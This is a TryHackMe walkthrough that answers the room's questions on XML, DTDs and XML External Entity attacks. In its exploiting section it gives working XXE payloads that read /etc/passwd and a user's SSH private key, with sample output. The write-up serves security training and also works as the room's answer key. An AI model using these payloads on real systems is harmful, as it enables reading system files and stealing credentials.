TryHackMe: OWASP Top 10 || Severity 4 || XML External Entity (XXE)
Before we begin the challenges, if you do not have basic understanding on XML, please read this article: https://goayxh.medium.com/markup-language-what-is-xml-aa7e5a3ec66b
[Severity 4] XML External Entity — eXtensible Markup Language
#1 Full form of XML
eXtensible Markup Language
#2 Is it compulsory to have XML prolog in XML documents?
No
#3 Can we validate XML documents against a schema?
Yes
#4 How can we specify XML version and encoding in XML document?
XML prolog
[Severity 4] XML External Entity — DTD
#1 How do you define a new ELEMENT?
!ELEMENT
#2 How do you define a ROOT element?
!DOCTYPE
#3 How do you define a new ENTITY?
!ENTITY
[Severity 4] XML External Entity — Exploiting
#1 What is the name of the user in /etc/passwd
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>falcon:x:1000:1000:falcon,,,:/home/falcon:/bin/bash
#2 Where is falcon’s SSH key located?
id_rsa is the default location where a ssh key is located. /home/falcon/.ssh/id_rsa
#3 What are the first 18 characters for falcon’s private key
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:/home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>-----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEA7b -----END RSA PRIVATE KEY-----